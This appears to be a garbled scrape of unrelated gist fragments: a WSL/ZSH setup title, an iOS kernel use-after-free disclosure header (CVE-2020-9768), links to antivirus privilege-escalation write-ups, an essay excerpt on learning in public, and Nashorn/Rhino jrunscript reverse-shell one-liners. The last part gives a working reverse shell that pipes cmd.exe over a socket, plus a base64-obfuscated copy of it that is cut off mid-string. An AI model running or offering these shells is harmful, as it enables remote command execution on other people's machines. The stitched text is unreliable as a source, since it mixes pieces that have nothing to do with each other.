Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font
To setup native Linux, see this gist
#if 0 | |
Reported : 19-Jan-2020 | |
Fixed in iOS 13.4 with CVE-2020-9768 | |
AppleJPEGDriverUserClient : mach port use-after-free/type-confusion via race condition | |
AppleJPEGDriverUserClient external methods can be used synchronously or asynchronously, when used asynchronously, | |
it brings the registered mach port (via registerNotificationPort()) and put it inside jpegRequest data structure, | |
and no reference count was taken for this operation. since registerNotificationPort() is not gated, it is | |
possible to release the port (if the port got substituted) during the processing of jpeg request and end up | |
with dangling pointer passed to _mach_msg_send_from_kernel_proper(). |
https://seclists.org/fulldisclosure/2019/Aug/1 | |
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67 | |
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/ | |
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM | |
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM | |
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM | |
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html | |
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968 | |
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6 | |
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html |
Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font
To setup native Linux, see this gist
2019 update: this essay has been updated on my personal site, together with a followup on how to get started
2020 update: I'm now writing a book with updated versions of all these essays and 35 other chapters!!!!
If there's a golden rule, it's this one, so I put it first. All the other rules are more or less elaborations of this rule #1.
You already know that you will never be done learning. But most people "learn in private", and lurk. They consume content without creating any themselves. Again, that's fine, but we're here to talk about being in the top quintile. What you do here is to have a habit of creating learning exhaust. Write blogs and tutorials and cheatsheets. Speak at meetups and conferences. Ask and answer things on Stackoverflow or Reddit. (Avoid the walled gardens like Slack and Discourse, they're not public). Make Youtube videos
Nashorn / Rhino:
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V